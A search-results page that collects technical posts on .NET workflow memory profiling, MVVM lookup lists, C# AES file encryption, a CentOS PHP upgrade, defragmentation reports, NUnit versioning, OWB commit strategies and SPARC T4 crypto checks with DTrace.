Search Results

Search found 464 results on 19 pages for 'the consequences of cheat'.

Page 18/19 | < Previous Page | 14 15 16 17 18 19 | Next Page >

Different Not Automatically Implies Better

- by Alois Kraus

Originally posted on: http://geekswithblogs.net/akraus1/archive/2013/11/05/154556.aspxRecently I was digging deeper why some WCF hosted workflow application did consume quite a lot of memory although it did basically only load a xaml workflow. The first tool of choice is Process Explorer or even better Process Hacker (has more options and the best feature copy&paste does work). The three most important numbers of a process with regards to memory are Working Set, Private Working Set and Private Bytes. Working set is the currently consumed physical memory (parts can be shared between processes e.g. loaded dlls which are read only) Private Working Set is the physical memory needed by this process which is not shareable Private Bytes is the number of non shareable which is only visible in the current process (e.g. all new, malloc, VirtualAlloc calls do create private bytes) When you have a bigger workflow it can consume under 64 bit easily 500MB for a 1-2 MB xaml file. This does not look very scalable. Under 64 bit the issue is excessive private bytes consumption and not the managed heap. The picture is quite different for 32 bit which looks a bit strange but it seems that the hosted VB compiler is a lot less memory hungry under 32 bit. I did try to repro the issue with a medium sized xaml file (400KB) which does contain 1000 variables and 1000 if which can be represented by C# code like this: string Var1; string Var2; ... string Var1000; if (!String.IsNullOrEmpty(Var1) ) { Console.WriteLine(“Var1”); } if (!String.IsNullOrEmpty(Var2) ) { Console.WriteLine(“Var2”); } .... Since WF is based on VB.NET expressions you are bound to the hosted VB.NET compiler which does result in (x64) 140 MB of private bytes which is ca. 140 KB for each if clause which is quite a lot if you think about the actually present functionality. But there is hope. .NET 4.5 does allow now C# expressions for WF which is a major step forward for all C# lovers. I did create some simple patcher to “cross compile” my xaml to C# expressions. Lets look at the result: C# Expressions VB Expressions x86 x86 On my home machine I have only 32 bit which gives you quite exactly half of the memory consumption under 64 bit. C# expressions are 10 times more memory hungry than VB.NET expressions! I wanted to do more with less memory but instead it did consume a magnitude more memory. That is surprising to say the least. The workflow does initialize in about the same time under x64 and x86 where the VB code does it in 2s whereas the C# version needs 18s. Also nearly ten times slower. That is a too high price to pay for any bigger sized xaml workflow to convert from VB.NET to C# expressions. If I do reduce the number of expressions to 500 then it does need 400MB which is about half of the memory. It seems that the cost per if does rise linear with the number of total expressions in a xaml workflow. Expression Language Cost per IF Startup Time C# 1000 Ifs x64 1,5 MB 18s C# 500 Ifs x64 750 KB 9s VB 1000 Ifs x64 140 KB 2s VB 500 Ifs x64 70 KB 1s Now we can directly compare two MS implementations. It is clear that the VB.NET compiler uses the same underlying structure but it has much higher offset compared to the highly inefficient C# expression compiler. I have filed a connect bug here with a harsher wording about recent advances in memory consumption. The funniest thing is that one MS employee did give an Azure AppFabric demo around early 2011 which was so slow that he needed to investigate with xperf. He was after startup time and the call stacks with regards to VB.NET expression compilation were remarkably similar. In fact I only found this post by googling for parts of my call stacks. … “C# expressions will be coming soon to WF, and that will have different performance characteristics than VB” … What did he know Jan 2011 what I did no know until today? ;-). He knew that C# expression will come but that they will not be automatically have better footprint. It is about time to fix that. In its current state C# expressions are not usable for bigger workflows. That also explains the headline for today. You can cheat startup time by prestarting workflows so that the demo looks nice and snappy but it does hurt scalability a lot since you do need much more memory than necessary. I did find the stacks by enabling virtual allocation tracking within XPerf which is still the best tool out there. But first you need to look at your process to check where the memory is hiding: For the C# Expression compiler you do not need xperf. You can directly dump the managed heap and check with a profiler of your choice. But if the allocations are happening on the Private Data ( VirtualAlloc ) you can find it with xperf. There is a nice video on channel 9 explaining VirtualAlloc tracking it in greater detail. If your data allocations are on the Heap it does mean that the C/C++ runtime did create a heap for you where all malloc, new calls do allocate from it. You can enable heap tracing with xperf and full call stack support as well which is doable via xperf like it is shown also on channel 9. Or you can use WPRUI directly: To make “Heap Usage” it work you need to set for your executable the tracing flags (before you start it). For example devenv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devenv.exe DWORD TracingFlags 1 Do not forget to disable it after you did complete profiling the process or it will impact the startup time quite a lot. You can with xperf attach directly to a running process and collect heap allocation information from a gone wild process. Very handy if you need to find out what a process was doing which has arrived in a funny state. “VirtualAlloc usage” does work without explicitly enabling stuff for a specific process and is always on machine wide. I had issues on my Windows 7 machines with the call stack collection and the latest Windows 8.1 Performance Toolkit. I was told that WPA from Windows 8.0 should work fine but I do not want to downgrade.

Read the article
MVVM pattern and nested view models - communication and lookup lists

- by LostInWPF

I am using Prism for a new application that I am creating. There are several lookup lists that will be used in several places in the application. Therefore it makes sense to define it once and use that everywhere I need that functionality. My current solution is to use typed data templates to render the controls inside a content control. <DataTemplate DataType={x:Type ListOfCountriesViewModel}> <ComboBox ItemsSource={Binding Countries} SelectedItem="{Binding SelectedCountry"/> </DataTemplate> <DataTemplate DataType={x:Type ListOfRegionsViewModel}> <ComboBox ItemsSource={Binding Countries} SelectedItem={Binding SelectedRegion} /> </DataTemplate> public class ParentViewModel { SelectedCountry get; set; SelectedRegion get; set; ListOfCountriesViewModel CountriesVM; ListOfRegionsViewModel RgnsVM; } Then in my window I have 2 content controls and the rest of the controls <ContentControl Content="{Binding CountriesVM}"></ContentControl> <ContentControl Content="{Binding RgnsVM}"></ContentControl> <Rest of controls on view> At the moment I have this working and the SelectedItems for the combo boxes are publising events via EventAggregator from the child view models which are then subscribed to in the parent view model. I am not sure that this is the best way to go as I can imagine I would end up with a lot of events very quickly and it will become unwieldy. Also if I was to use the same view model on another window it will publish the event and this parent viewmodel is subscribed to it which could have unintended consequences. My questions are :- Is this the best way to put lookup lists in a view which can be re-used across screens? How do I make it so that the combobox which is bound to the child viewmodel sets the relevant property on the parent viewmodel without using events / mediator. e.g in this case SelectedCountry for example? Any alternative implementation proposals for what I am trying to do? I have a feeling I am missing something obvious and there is so much info it is hard to know what is right so any help would be most gratefully received.

Read the article
Retrieving Encrypted Rich Text file and showing it in a RichTextBox C#

- by Ranhiru

OK, my need here is to save whatever typed in the rich text box to a file, encrypted, and also retrieve the text from the file again and show it back on the rich textbox. Here is my save code. private void cmdSave_Click(object sender, EventArgs e) { FileStream fs = new FileStream(filePath, FileMode.Create, FileAccess.Write); AesCryptoServiceProvider aes = new AesCryptoServiceProvider(); aes.GenerateIV(); aes.GenerateKey(); aes.Mode = CipherMode.CBC; TextWriter twKey = new StreamWriter("key"); twKey.Write(ASCIIEncoding.ASCII.GetString(aes.Key)); twKey.Close(); TextWriter twIV = new StreamWriter("IV"); twIV.Write(ASCIIEncoding.ASCII.GetString(aes.IV)); twIV.Close(); ICryptoTransform aesEncrypt = aes.CreateEncryptor(); CryptoStream cryptoStream = new CryptoStream(fs, aesEncrypt, CryptoStreamMode.Write); richTextBox1.SaveFile(cryptoStream, RichTextBoxStreamType.RichText); } I know the security consequences of saving the key and iv in a file but this just for testing :) Well, the saving part works fine which means no exceptions... The file is created in filePath and the key and IV files are created fine too... OK now for retrieving part where I am stuck :S private void cmdOpen_Click(object sender, EventArgs e) { OpenFileDialog openFile = new OpenFileDialog(); openFile.ShowDialog(); FileStream openRTF = new FileStream(openFile.FileName, FileMode.Open, FileAccess.Read); AesCryptoServiceProvider aes = new AesCryptoServiceProvider(); TextReader trKey = new StreamReader("key"); byte[] AesKey = ASCIIEncoding.ASCII.GetBytes(trKey.ReadLine()); TextReader trIV = new StreamReader("IV"); byte[] AesIV = ASCIIEncoding.ASCII.GetBytes(trIV.ReadLine()); aes.Key = AesKey; aes.IV = AesIV; ICryptoTransform aesDecrypt = aes.CreateDecryptor(); CryptoStream cryptoStream = new CryptoStream(openRTF, aesDecrypt, CryptoStreamMode.Read); StreamReader fx = new StreamReader(cryptoStream); richTextBox1.Rtf = fx.ReadToEnd(); //richTextBox1.LoadFile(fx.BaseStream, RichTextBoxStreamType.RichText); } But the richTextBox1.Rtf = fx.ReadToEnd(); throws an cryptographic exception "Padding is invalid and cannot be removed." while richTextBox1.LoadFile(fx.BaseStream, RichTextBoxStreamType.RichText); throws an NotSupportedException "Stream does not support seeking." Any suggestions on what i can do to load the data from the encrypted file and show it in the rich text box?

Read the article
Upgrading PHP from 5.1 to 5.2 on CentOS 5.4

- by andufo

i'm trying to upgrade php 5.1 to 5.2 on a CentOS 5.4 I use: yum upgrade php The result is this (check out the last part): [root@mail httpd]# yum update php Loaded plugins: fastestmirror Loading mirror speeds from cached hostfile * addons: mirror.raystedman.net * base: mirrors.serveraxis.net * centosplus: mirrors.tummy.com * contrib: mirror.raystedman.net * extras: mirror.raystedman.net * updates: mirrors.netdna.com Setting up Update Process Resolving Dependencies --> Running transaction check --> Processing Dependency: php = 5.1.6-27.el5 for package: php-devel --> Processing Dependency: php = 5.1.6 for package: php-eaccelerator ---> Package php.x86_64 0:5.2.10-1.el5.centos set to be updated --> Processing Dependency: php-cli = 5.2.10-1.el5.centos for package: php --> Processing Dependency: php-common = 5.2.10-1.el5.centos for package: php --> Running transaction check --> Processing Dependency: php = 5.1.6 for package: php-eaccelerator ---> Package php-cli.x86_64 0:5.2.10-1.el5.centos set to be updated --> Processing Dependency: php-common = 5.1.6-27.el5 for package: php-xml --> Processing Dependency: php-common = 5.1.6-27.el5 for package: php-pdo --> Processing Dependency: php-common = 5.1.6-27.el5 for package: php-gd --> Processing Dependency: php-common = 5.1.6-27.el5 for package: php-ldap --> Processing Dependency: php-common = 5.1.6-27.el5 for package: php-mbstring --> Processing Dependency: php-common = 5.1.6-27.el5 for package: php-mysql --> Processing Dependency: php-common = 5.1.6-27.el5 for package: php-imap ---> Package php-common.x86_64 0:5.2.10-1.el5.centos set to be updated ---> Package php-devel.x86_64 0:5.2.10-1.el5.centos set to be updated --> Running transaction check --> Processing Dependency: php = 5.1.6 for package: php-eaccelerator ---> Package php-gd.x86_64 0:5.2.10-1.el5.centos set to be updated ---> Package php-imap.x86_64 0:5.2.10-1.el5.centos set to be updated ---> Package php-ldap.x86_64 0:5.2.10-1.el5.centos set to be updated ---> Package php-mbstring.x86_64 0:5.2.10-1.el5.centos set to be updated ---> Package php-mysql.x86_64 0:5.2.10-1.el5.centos set to be updated ---> Package php-pdo.x86_64 0:5.2.10-1.el5.centos set to be updated ---> Package php-xml.x86_64 0:5.2.10-1.el5.centos set to be updated --> Finished Dependency Resolution php-eaccelerator-5.1.6_0.9.5.2-4.el5.rf.x86_64 from installed has depsolving problems --> Missing Dependency: php = 5.1.6 is needed by package php-eaccelerator-5.1.6_0.9.5.2-4.el5.rf.x86_64 (installed) Error: Missing Dependency: php = 5.1.6 is needed by package php-eaccelerator-5.1.6_0.9.5.2-4.el5.rf.x86_64 (installed) You could try using --skip-broken to work around the problem You could try running: package-cleanup --problems package-cleanup --dupes rpm -Va --nofiles --nodigest The program package-cleanup is found in the yum-utils package. [root@mail httpd]# What are the consequences of using --skip-broken? Any recommendations?

Read the article
Windows 7 inbuilt and 3rd party (de)fragmentation related queries

- by Karan

I have a pretty good idea of how files end up getting fragmented. That said, I just copied ~3,200 files of varying sizes (from a few KB to ~20GB) from an external USB HDD to an internal, freshly formatted (under Windows 7 x64), NTFS, 2TB, 5400RPM, WD, SATA, non-system (i.e. secondary) drive, filling it up 57%. Since it should have been very much possible for each file to have been stored in one contiguous block, I expected the drive to be fragmented not more than 1-2% at most after this rather lengthy exercise (unfortunately this older machine doesn't support USB 3.0). Windows 7's inbuilt defrag utility told me after a quick analysis that the drive was fragmented only 1% or so, which dovetailed neatly with my expectations. However, just out of curiosity I downloaded and ran the latest portable x64 version of Piriform's Defraggler, and was shocked to see the drive being reported as being ~85% fragmented! The portable version of Auslogics Disk Defrag also agreed with Defraggler, and both clearly expected to grind away for ~10 hours to completely defragment the drive. 1) How in blazes could the inbuilt and 3rd party defrag utils disagree so badly? I mean, 10-20% variance is probably understandable, but 1% and 85% are miles apart! This Engineering Windows 7 blog post states: In Windows XP, any file that is split into more than one piece is considered fragmented. Not so in Windows Vista if the fragments are large enough – the defragmentation algorithm was changed (from Windows XP) to ignore pieces of a file that are larger than 64MB. As a result, defrag in XP and defrag in Vista will report different amounts of fragmentation on a volume. ... [Please read the entire post so the quote is not taken out of context.] Could it simply be that the 3rd party defrag utils ignore this post-XP change and continue to use analysis algos similar to those XP used? 2) Assuming that the 3rd party utils aren't lying about the real extent of fragmentation (which Windows is downplaying post-XP), how could the files have even got fragmented so badly given they were just copied over afresh to an empty drive? 3) If vastly differing analysis algos explain the yawning gap, which do I believe? I'm no defrag fanatic for sure, but 85% is enough to make me seriously consider spending 10 hours defragging this drive. On the other hand, 1% reported by Windows' own defragger clearly implies that there is no cause for concern and defragging would actually have negative consequences (as per the post). Is Windows' assumption valid and should I just let it be, or will there be any noticeable performance gains after running one of the 3rd party utils for 10 hours straight? 4) I see that out of the box Windows 7 defrag is scheduled to run weekly. Does anyone know whether it defrags every single time, or only if its analysis reveals a fragmentation percentage over a set threshold? If the latter, what is this threshold and can it be changed, maybe via a Registry edit? Thanks for reading through (my first query on this wonderful site!) and for any helpful replies. Also, if you're answering question #3, please keep in mind that any speed increases post defragging with 3rd party utils vis-à-vis Windows' inbuilt program should not include pre-Vista (preferably pre-Win7) examples. Further, examples of programs that made your system boot faster won't help in this case, since this is a non-system drive (although one that'll still be used daily).

Read the article
Run Your Tests With Any NUnit Version

- by Alois Kraus

I always thought that the NUnit test runners and the test assemblies need to reference the same NUnit.Framework version. I wanted to be able to run my test assemblies with the newest GUI runner (currently 2.5.3). Ok so all I need to do is to reference both NUnit versions the newest one and the official for the current project. There is a nice article form Kent Bogart online how to reference the same assembly multiple times with different versions. The magic works by referencing one NUnit assembly with an alias which does prefix all types inside it. Then I could decorate my tests with the TestFixture and Test attribute from both NUnit versions and everything worked fine except that this was ugly. After playing a little bit around to make it simpler I found that I did not need to reference both NUnit.Framework assemblies. The test runners do not require the TestFixture and Test attribute in their specific version. That is really neat since the test runners are instructed by attributes what to do in a declarative way there is really no need to tie the runners to a specific version. At its core NUnit has this little method hidden to find matching TestFixtures and Tests public bool CanBuildFrom(Type type) { if (!(!type.IsAbstract || type.IsSealed)) { return false; } return (((Reflect.HasAttribute(type, "NUnit.Framework.TestFixtureAttribute", true) || Reflect.HasMethodWithAttribute(type, "NUnit.Framework.TestAttribute" , true)) || Reflect.HasMethodWithAttribute(type, "NUnit.Framework.TestCaseAttribute" , true)) || Reflect.HasMethodWithAttribute(type, "NUnit.Framework.TheoryAttribute" , true)); } That is versioning and backwards compatibility at its best. I tell NUnit what to do by decorating my tests classes with NUnit Attributes and the runner executes my intent without the need to bind me to a specific version. The contract between NUnit versions is actually a bit more complex (think of AssertExceptions) but this is also handled nicely by using not the concrete type but simply to check for the catched exception type by string. What can we learn from this? Versioning can be easy if the contract is small and the users of your library use it in a declarative way (Attributes). Everything beyond it will force you to reference several versions of the same assembly with all its consequences. Type equality is lost between versions so none of your casts will work. That means that you cannot simply use IBigInterface in two versions. You will need a wrapper to call the correct versioned one. To get out of this mess you can use one (and only one) version agnostic driver to encapsulate your business logic from the concrete versions. This is of course more work but as NUnit shows it can be easy. Simplicity is therefore not a nice thing to have but also requirement number one if you intend to make things more complex in version two and want to support any version (older and newer). Any interaction model above easy will not be maintainable. There are different approached to versioning. Below are my own personal observations how versioning works within the .NET Framwork and NUnit. Versioning Models 1. Bug Fixing and New Isolated Features When you only need to fix bugs there is no need to break anything. This is especially true when you have a big API surface. Microsoft did this with the .NET Framework 3.0 which did leave the CLR as is but delivered new assemblies for the features WPF, WCF and Windows Workflow Foundations. Their basic model was that the .NET 2.0 assemblies were declared as red assemblies which must not change (well mostly but each change was carefully reviewed to minimize the risk of breaking changes as much as possible) whereas the new green assemblies of .NET 3,3.5 did not have such obligations since they did implement new unrelated features which did not have any impact on the red assemblies. This is versioning strategy aimed at maximum compatibility and the delivery of new unrelated features. If you have a big API surface you should strive hard to do the same or you will break your customers code with every release. 2. New Breaking Features There are times when really new things need to be added to an existing product. The .NET Framework 4.0 did change the CLR in many ways which caused subtle different behavior although the API´s remained largely unchanged. Sometimes it is possible to simply recompile an application to make it work (e.g. changed method signature void Func() –> bool Func()) but behavioral changes need much more thought and cannot be automated. To minimize the impact .NET 2.0,3.0,3.5 applications will not automatically use the .NET 4.0 runtime when installed but they will keep using the “old” one. What is interesting is that a side by side execution model of both CLR versions (2 and 4) within one process is possible. Key to success was total isolation. You will have 2 GCs, 2 JIT compilers, 2 finalizer threads within one process. The two .NET runtimes cannot talk (except via the usual IPC mechanisms) to each other. Both runtimes share nothing and run independently within the same process. This enables Explorer plugins written for the CLR 2.0 to work even when a CLR 4 plugin is already running inside the Explorer process. The price for isolation is an increased memory footprint because everything is loaded and running two times. 3. New Non Breaking Features It really depends where you break things. NUnit has evolved and many different Assert, Expect… methods have been added. These changes are all localized in the NUnit.Framework assembly which can be easily extended. As long as the test execution contract (TestFixture, Test, AssertException) remains stable it is possible to write test executors which can run tests written for NUnit 10 because the execution contract has not changed. It is possible to write software which executes other components in a version independent way but this is only feasible if the interaction model is relatively simple. Versioning software is hard and it looks like it will remain hard since you suddenly work in a severely constrained environment when you try to innovate and to keep everything backwards compatible at the same time. These are contradicting goals and do not play well together. The easiest way out of this is to carefully watch what your customers are doing with your software. Minimizing the impact is much easier when you do not need to guess how many people will be broken when this or that is removed.

Read the article
Combination of Operating Mode and Commit Strategy

- by Kevin Yang

If you want to populate a source into multiple targets, you may also want to ensure that every row from the source affects all targets uniformly (or separately). Let’s consider the Example Mapping below. If a row from SOURCE causes different changes in multiple targets (TARGET_1, TARGET_2 and TARGET_3), for example, it can be successfully inserted into TARGET_1 and TARGET_3, but failed to be inserted into TARGET_2, and the current Mapping Property TLO (target load order) is “TARGET_1 -> TARGET_2 -> TARGET_3”. What should Oracle Warehouse Builder do, in order to commit the appropriate data to all affected targets at the same time? If it doesn’t behave as you intended, the data could become inaccurate and possibly unusable. Example Mapping In OWB, we can use Mapping Configuration Commit Strategies and Operating Modes together to achieve this kind of requirements. Below we will explore the combination of these two features and how they affect the results in the target tables Before going to the example, let’s review some of the terms we will be using (Details can be found in white paper Oracle® Warehouse Builder Data Modeling, ETL, and Data Quality Guide11g Release 2): Operating Modes: Set-Based Mode: Warehouse Builder generates a single SQL statement that processes all data and performs all operations. Row-Based Mode: Warehouse Builder generates statements that process data row by row. The select statement is in a SQL cursor. All subsequent statements are PL/SQL. Row-Based (Target Only) Mode: Warehouse Builder generates a cursor select statement and attempts to include as many operations as possible in the cursor. For each target, Warehouse Builder inserts each row into the target separately. Commit Strategies: Automatic: Warehouse Builder loads and then automatically commits data based on the mapping design. If the mapping has multiple targets, Warehouse Builder commits and rolls back each target separately and independently of other targets. Use the automatic commit when the consequences of multiple targets being loaded unequally are not great or are irrelevant. Automatic correlated: It is a specialized type of automatic commit that applies to PL/SQL mappings with multiple targets only. Warehouse Builder considers all targets collectively and commits or rolls back data uniformly across all targets. Use the correlated commit when it is important to ensure that every row in the source affects all affected targets uniformly. Manual: select manual commit control for PL/SQL mappings when you want to interject complex business logic, perform validations, or run other mappings before committing data. Combination of the commit strategy and operating mode To understand the effects of each combination of operating mode and commit strategy, I’ll illustrate using the following example Mapping. Firstly we insert 100 rows into the SOURCE table and make sure that the 99th row and 100th row have the same ID value. And then we create a unique key constraint on ID column for TARGET_2 table. So while running the example mapping, OWB tries to load all 100 rows to each of the targets. But the mapping should fail to load the 100th row to TARGET_2, because it will violate the unique key constraint of table TARGET_2. With different combinations of Commit Strategy and Operating Mode, here are the results ¦ Set-based/ Correlated Commit: Configuration of Example mapping: Result: What’s happening: A single error anywhere in the mapping triggers the rollback of all data. OWB encounters the error inserting into Target_2, it reports an error for the table and does not load the row. OWB rolls back all the rows inserted into Target_1 and does not attempt to load rows to Target_3. No rows are added to any of the target tables. ¦ Row-based/ Correlated Commit: Configuration of Example mapping: Result: What’s happening: OWB evaluates each row separately and loads it to all three targets. Loading continues in this way until OWB encounters an error loading row 100th to Target_2. OWB reports the error and does not load the row. It rolls back the row 100th previously inserted into Target_1 and does not attempt to load row 100 to Target_3. Then, if there are remaining rows, OWB will continue loading them, resuming with loading rows to Target_1. The mapping completes with 99 rows inserted into each target. ¦ Set-based/ Automatic Commit: Configuration of Example mapping: Result: What’s happening: When OWB encounters the error inserting into Target_2, it does not load any rows and reports an error for the table. It does, however, continue to insert rows into Target_3 and does not roll back the rows previously inserted into Target_1. The mapping completes with one error message for Target_2, no rows inserted into Target_2, and 100 rows inserted into Target_1 and Target_3 separately. ¦ Row-based/Automatic Commit: Configuration of Example mapping: Result: What’s happening: OWB evaluates each row separately for loading into the targets. Loading continues in this way until OWB encounters an error loading row 100 to Target_2 and reports the error. OWB does not roll back row 100th from Target_1, does insert it into Target_3. If there are remaining rows, it will continue to load them. The mapping completes with 99 rows inserted into Target_2 and 100 rows inserted into each of the other targets. Note: Automatic Correlated commit is not applicable for row-based (target only). If you design a mapping with the row-based (target only) and correlated commit combination, OWB runs the mapping but does not perform the correlated commit. In set-based mode, correlated commit may impact the size of your rollback segments. Space for rollback segments may be a concern when you merge data (insert/update or update/insert). Correlated commit operates transparently with PL/SQL bulk processing code. The correlated commit strategy is not available for mappings run in any mode that are configured for Partition Exchange Loading or that include a Queue, Match Merge, or Table Function operator. If you want to practice in your own environment, you can follow the steps: 1. Import the MDL file: commit_operating_mode.mdl 2. Fix the location for oracle module ORCL and deploy all tables under it. 3. Insert sample records into SOURCE table, using below plsql code: begin for i in 1..99 loop insert into source values(i, 'col_'||i); end loop; insert into source values(99, 'col_99'); end; 4. Configure MAPPING_1 to any combinations of operating mode and commit strategy you want to test. And make sure feature TLO of mapping is open. 5. Deploy Mapping “MAPPING_1”. 6. Run the mapping and check the result.

Read the article
How to tell if SPARC T4 crypto is being used?

- by danx

A question that often comes up when running applications on SPARC T4 systems is "How can I tell if hardware crypto accleration is being used?" To review, the SPARC T4 processor includes a crypto unit that supports several crypto instructions. For hardware crypto these include 11 AES instructions, 4 xmul* instructions (for AES GCM carryless multiply), mont for Montgomery multiply (optimizes RSA and DSA), and 5 des_* instructions (for DES3). For hardware hash algorithm optimization, the T4 has the md5, sha1, sha256, and sha512 instructions (the last two are used for SHA-224 an SHA-384). First off, it's easy to tell if the processor T4 crypto instructions—use the isainfo -v command and look for "sparcv9" and "aes" (and other hash and crypto algorithms) in the output: $ isainfo -v 64-bit sparcv9 applications crc32c cbcond pause mont mpmul sha512 sha256 sha1 md5 camellia kasumi des aes ima hpc vis3 fmaf asi_blk_init vis2 vis popc These instructions are not-privileged, so are available for direct use in user-level applications and libraries (such as OpenSSL). Here is the "openssl speed -evp" command shown with the built-in t4 engine and with the pkcs11 engine. Both run the T4 AES instructions, but the t4 engine is faster than the pkcs11 engine because it has less overhead (especially for smaller packet sizes): t-4 $ /usr/bin/openssl version OpenSSL 1.0.0j 10 May 2012 t-4 $ /usr/bin/openssl engine (t4) SPARC T4 engine support (dynamic) Dynamic engine loading support (pkcs11) PKCS #11 engine support t-4 $ /usr/bin/openssl speed -evp aes-128-cbc # t4 engine used by default . . . The 'numbers' are in 1000s of bytes per second processed. type 16 bytes 64 bytes 256 bytes 1024 bytes 8192 bytes aes-128-cbc 487777.10k 816822.21k 986012.59k 1017029.97k 1053543.08k t-4 $ /usr/bin/openssl speed -engine pkcs11 -evp aes-128-cbc engine "pkcs11" set. . . . The 'numbers' are in 1000s of bytes per second processed. type 16 bytes 64 bytes 256 bytes 1024 bytes 8192 bytes aes-128-cbc 31703.58k 116636.39k 350672.81k 696170.50k 993599.49k Note: The "-evp" flag indicates use the OpenSSL "EnVeloPe" API, which gives more accurate results. That's because it tells OpenSSL to use the same API that external programs use when calling OpenSSL libcrypto functions, evp(3openssl). DTrace Shows if T4 Crypto Functions Are Used OK, good enough, the isainfo(1) command shows the instructions are present, but how does one know if they are being used? Chi-Chang Lin, who works on Oracle Solaris performance, wrote a Dtrace script to show if T4 instructions are being executed. To show the T4 instructions are being used, run the following Dtrace script. Look for functions named "t4" and "yf" in the output. The OpenSSL T4 engine uses functions named "t4" and the PKCS#11 engine uses functions named "yf". To demonstrate, I'll first run "openssl speed" with the built-in t4 engine then with the pkcs11 engine. The performance numbers are not valid due to dtrace probes slowing things down. t-4 # dtrace -Z -n ' pid$target::*yf*:entry,pid$target::*t4_*:entry{ @[probemod, probefunc] = count();}' \ -c "/usr/bin/openssl speed -evp aes-128-cbc" dtrace: description 'pid$target::*yf*:entry' matched 101 probes . . . dtrace: pid 2029 has exited libcrypto.so.1.0.0 ENGINE_load_t4 1 libcrypto.so.1.0.0 t4_DH 1 libcrypto.so.1.0.0 t4_DSA 1 libcrypto.so.1.0.0 t4_RSA 1 libcrypto.so.1.0.0 t4_destroy 1 libcrypto.so.1.0.0 t4_free_aes_ctr_NIDs 1 libcrypto.so.1.0.0 t4_init 1 libcrypto.so.1.0.0 t4_add_NID 3 libcrypto.so.1.0.0 t4_aes_expand128 5 libcrypto.so.1.0.0 t4_cipher_init_aes 5 libcrypto.so.1.0.0 t4_get_all_ciphers 6 libcrypto.so.1.0.0 t4_get_all_digests 59 libcrypto.so.1.0.0 t4_digest_final_sha1 65 libcrypto.so.1.0.0 t4_digest_init_sha1 65 libcrypto.so.1.0.0 t4_sha1_multiblock 126 libcrypto.so.1.0.0 t4_digest_update_sha1 261 libcrypto.so.1.0.0 t4_aes128_cbc_encrypt 1432979 libcrypto.so.1.0.0 t4_aes128_load_keys_for_encrypt 1432979 libcrypto.so.1.0.0 t4_cipher_do_aes_128_cbc 1432979 t-4 # dtrace -Z -n 'pid$target::*yf*:entry{ @[probemod, probefunc] = count();} pid$target::*yf*:entry,pid$target::*t4_*:entry{ @[probemod, probefunc] = count();}' \ -c "/usr/bin/openssl speed -engine pkcs11 -evp aes-128-cbc" dtrace: description 'pid$target::*yf*:entry' matched 101 probes engine "pkcs11" set. . . . dtrace: pid 2033 has exited libcrypto.so.1.0.0 ENGINE_load_t4 1 libcrypto.so.1.0.0 t4_DH 1 libcrypto.so.1.0.0 t4_DSA 1 libcrypto.so.1.0.0 t4_RSA 1 libcrypto.so.1.0.0 t4_destroy 1 libcrypto.so.1.0.0 t4_free_aes_ctr_NIDs 1 libcrypto.so.1.0.0 t4_get_all_ciphers 1 libcrypto.so.1.0.0 t4_get_all_digests 1 libsoftcrypto.so.1 rijndael_key_setup_enc_yf 1 libsoftcrypto.so.1 yf_aes_expand128 1 libcrypto.so.1.0.0 t4_add_NID 3 libsoftcrypto.so.1 yf_aes128_cbc_encrypt 1542330 libsoftcrypto.so.1 yf_aes128_load_keys_for_encrypt 1542330 So, as shown above the OpenSSL built-in t4 engine executes t4_* functions (which are hand-coded assembly executing the T4 AES instructions) and the OpenSSL pkcs11 engine executes *yf* functions. Programmatic Use of OpenSSL T4 engine The OpenSSL t4 engine is used automatically with the /usr/bin/openssl command line. Chi-Chang Lin also points out that if you're calling the OpenSSL API (libcrypto.so) from a program, you must call ENGINE_load_built_engines(), otherwise the built-in t4 engine will not be loaded. You do not call ENGINE_set_default(). That's because "openssl speed -evp" test calls ENGINE_load_built_engines() even though the "-engine" option wasn't specified. OpenSSL T4 engine Availability The OpenSSL t4 engine is available with Solaris 11 and 11.1. For Solaris 10 08/11 (U10), you need to use the OpenSSL pkcs311 engine. The OpenSSL t4 engine is distributed only with the version of OpenSSL distributed with Solaris (and not third-party or self-compiled versions of OpenSSL). The OpenSSL engine implements the AES cipher for Solaris 11, released 11/2011. For Solaris 11.1, released 11/2012, the OpenSSL engine adds optimization for the MD5, SHA-1, and SHA-2 hash algorithms, and DES-3. Although the T4 processor has Camillia and Kasumi block cipher instructions, these are not implemented in the OpenSSL T4 engine. The following charts may help view availability of optimizations. The first chart shows what's available with Solaris CLIs and APIs, the second chart shows what's available in Solaris OpenSSL. Native Solaris Optimization for SPARC T4 This table is shows Solaris native CLI and API support. As such, they are all available with the OpenSSL pkcs11 engine. CLIs: "openssl -engine pkcs11", encrypt(1), decrypt(1), mac(1), digest(1), MD5sum(1), SHA1sum(1), SHA224sum(1), SHA256sum(1), SHA384sum(1), SHA512sum(1) APIs: PKCS#11 library libpkcs11(3LIB) (incluDES Openssl pkcs11 engine), libMD(3LIB), and Solaris kernel modules AlgorithmSolaris 1008/11 (U10)Solaris 11Solaris 11.1 AES-ECB, AES-CBC, AES-CTR, AES-CBC AES-CFB128 XXX DES3-ECB, DES3-CBC, DES2-ECB, DES2-CBC, DES-ECB, DES-CBC XXX bignum Montgomery multiply (RSA, DSA) XXX MD5, SHA-1, SHA-256, SHA-384, SHA-512 XXX SHA-224 X ARCFOUR (RC4) X Solaris OpenSSL T4 Engine Optimization This table is for the Solaris OpenSSL built-in t4 engine. Algorithms listed above are also available through the OpenSSL pkcs11 engine. CLI: openssl(1openssl) APIs: openssl(5), engine(3openssl), evp(3openssl), libcrypto crypto(3openssl) AlgorithmSolaris 11Solaris 11SRU2Solaris 11.1 AES-ECB, AES-CBC, AES-CTR, AES-CBC AES-CFB128 XXX DES3-ECB, DES3-CBC, DES-ECB, DES-CBC X bignum Montgomery multiply (RSA, DSA) X MD5, SHA-1, SHA-256, SHA-384, SHA-512 XX SHA-224 X Source Code Availability Solaris Most of the T4 assembly code that called the new T4 crypto instructions was written by Ferenc Rákóczi of the Solaris Security group, with assistance from others. You can download the Solaris source for this and other parts of Solaris as a few zip files at the Oracle Download website. The relevant source files are generally under directories usr/src/common/crypto/{aes,arcfour,des,md5,modes,sha1,sha2}}/sun4v/. and usr/src/common/bignum/sun4v/. Solaris 11 binary is available from the Oracle Solaris 11 download website. OpenSSL t4 engine The source for the OpenSSL t4 engine, which is based on the Solaris source above, is viewable through the OpenGrok source code browser in directory src/components/openssl/openssl-1.0.0/engines/t4 . You can download the source from the same website or through Mercurial source code management, hg(1). Conclusion Oracle Solaris with SPARC T4 provides a rich set of accelerated cryptographic and hash algorithms. Using the latest update, Solaris 11.1, provides the best set of optimized algorithms, but alternatives are often available, sometimes slightly slower, for releases back to Solaris 10 08/11 (U10). Reference See also 